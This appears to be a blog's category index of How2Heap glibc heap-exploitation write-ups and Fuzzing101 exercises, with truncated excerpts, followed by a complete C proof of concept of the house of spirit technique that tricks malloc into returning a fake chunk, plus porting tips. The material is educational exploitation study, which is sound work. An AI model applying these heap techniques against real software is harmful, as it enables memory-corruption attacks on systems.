All categories (17)

[How2Heap] - house_of_einherjar.c
"Exploiting a single null byte overflow to trick malloc into returning a controlled pointer. Tested on Ubuntu 20.10 64bit (glibc-2.32)." That is what the header says. "demonstrates the house of einherjar attack by creating a chunk overlapping situation": it will perform the house of einherjar attack by creating an overlapping chunk.
#include #include #include #include #include int main(){ /* * This modification to The House of Enherjar works with the..

[How2Heap] - mmap_overlapping_chunks.c
#include #include #include #include /*Technique should work on all versions of GLibC. Compile: `gcc mmap_overlapping_chunks.c -o mmap_overlapping_chunks -g`. POC written by Maxwell Dulin (Strikeout)*/int main(){ /* A primer on Mmap chunks in GLibC ================================== In GLibC, there is a point where an allocation is so large that malloc ..

[How2Heap] - overlapping_chunks.c
/* A simple tale of overlapping chunk. This technique is taken from http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf*/#include #include #include #include #include int main(int argc , char* argv[]){ setbuf(stdout, NULL); long *p1,*p2,*p3,*p4; printf("\nThis is another simple chunks overlapping problem\n"); printf("The previous technique is killed by patch: https://..

[How2Heap] - house_of_lore.c
Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist. /*Advanced exploitation of the House of Lore - Malloc Maleficarum. This PoC takes care also of the glibc hardening of smallbin corruption.[ ... ]else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)){ errstr = "malloc(): smallbin double linked list corrupted"; ..

[How2Heap] - house_of_spirit.c
Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer. #include #include int main(){ fprintf(stderr, "This file demonstrates the house of spirit attack.\n"); fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n"); malloc(1); fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n"); unsigned long long *a; // This has nothi..

[Fuzzing101] Exercise 2
https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%202 (Fuzzing101, a step-by-step fuzzing tutorial from the GitHub Security Lab)
The target is libexif. First, download libexif-0.6.14:
wget https://github.com/libexif/libexif/archive/refs/tags/libexif-0_6_14-release.tar.gz
tar -xzvf libexif-0_6_14-release.tar...

[Fuzzing101] - Exercise 1
I will do Exercise 1 of Fuzzing101. The target is Xpdf. "All the exercises have been tested on Ubuntu 20.04.2 LTS. You can download it from here" (ubuntu.com). So it tells you to download Ubuntu 20.04.2 LTS. Download it, then install the packages: sudo apt update -y && su..

06. [How2Heap] - unsafe_unlink.c
#include #include #include #include #include uint64_t *chunk0_ptr;int main(){ setbuf(stdout, NULL); printf("Welcome to unsafe unlink 2.0!\n"); printf("Tested in Ubuntu 20.04 64bit.\n"); printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n"); printf("The most common scenario is a vulnerable buffer t..
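The house_of_spirit entry above sums the technique up in one line: hand free() a pointer into memory you control, laid out to look like a small chunk, and the next malloc() of that size class returns that memory. The program below is an added example written for this listing; it is not the How2Heap file and not code from the posts. It assumes glibc malloc on a 64-bit target (16-byte chunk headers and alignment), that a 0x40-byte chunk is served from tcache (glibc 2.26 and later) or from a fastbin (older glibc), and that the arena and tcache already exist after one malloc() call. The fake chunk size 0x40, the request size 0x38, and the neighbour size 0x1234 are my choices: 0x1234 only has to look sane to the fastbin path of free() (larger than a header, smaller than the arena's system_mem). The pointer overwrite that would exist in a real target is simulated by passing the crafted address to free() directly.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added house-of-spirit demonstration (not the How2Heap file).
 * Assumes glibc malloc, x86_64: 16-byte chunk headers, 16-byte aligned
 * chunks, 0x40-byte chunks served from tcache (glibc >= 2.26) or a
 * fastbin (older glibc). Sizes below are chosen for this example. */

#define FAKE_SIZE      0x40UL   /* size field of the fake chunk              */
#define NEXT_FAKE_SIZE 0x1234UL /* size free() reads for the fake neighbour  */
#define REQUEST_SIZE   0x38     /* malloc(0x38) is rounded up to a 0x40 chunk */

/* Backing store for the fake chunks. It lives in .bss, not on the heap,
 * which is the whole point of the attack. free() rejects chunk pointers
 * that are not 16-byte aligned, hence the alignment. */
static _Alignas(16) uint64_t fake_region[16];

/* Lay out a fake 0x40 chunk followed by a fake neighbour header and return
 * the address a vulnerable program would pass to free(): the user-data
 * pointer 16 bytes past the chunk header. */
static void *build_fake_chunk(void)
{
    memset(fake_region, 0, sizeof fake_region);
    fake_region[0] = 0;              /* prev_size of the fake chunk, unused   */
    fake_region[1] = FAKE_SIZE;      /* chunksize 0x40, no flag bits set      */
    /* fake_region[2..7] is the 48-byte user area. Slot 3 is where tcache
     * stores its double-free key, so it must not already hold that key;
     * the memset above takes care of that. */
    fake_region[8] = 0;              /* prev_size of the fake neighbour       */
    fake_region[9] = NEXT_FAKE_SIZE; /* neighbour size: > header, < system_mem */
    return &fake_region[2];
}

/* Returns 1 when malloc() hands back the fake region, 0 otherwise. */
int house_of_spirit_demo(void)
{
    void *warmup = malloc(1);        /* make sure the arena and tcache exist */
    (void)warmup;

    void *fake_mem = build_fake_chunk();

    /* In a real target a dangling or overwritten pointer reaches free()
     * here; this example simply passes the crafted address. The chunk is
     * pushed onto the tcache bin (or fastbin) for size 0x40. */
    free(fake_mem);

    /* Same size class: the allocator pops the fake chunk straight back. */
    char *got = malloc(REQUEST_SIZE);
    if (got != fake_mem)
        return 0;

    /* Writes through the returned pointer now land in fake_region. */
    strcpy(got, "spirit");
    return memcmp(&fake_region[2], "spirit", 7) == 0;
}

int main(void)
{
    if (house_of_spirit_demo())
        printf("malloc(0x%x) returned the fake chunk at %p\n",
               REQUEST_SIZE, (void *)&fake_region[2]);
    else
        printf("malloc() did not return the fake chunk "
               "(different allocator or layout)\n");
    return 0;
}
```

Compile with `gcc house_of_spirit_demo.c -o house_of_spirit_demo` and run it; no compiler flags are needed because nothing here overflows a buffer. The two checks to keep in mind when porting this to a target: the size field must pass free()'s sanity tests for its path (aligned, at least MINSIZE, not flagged as mmapped), and on glibc builds without tcache the fake neighbour's size must also look plausible, which is what fake_region[9] is for.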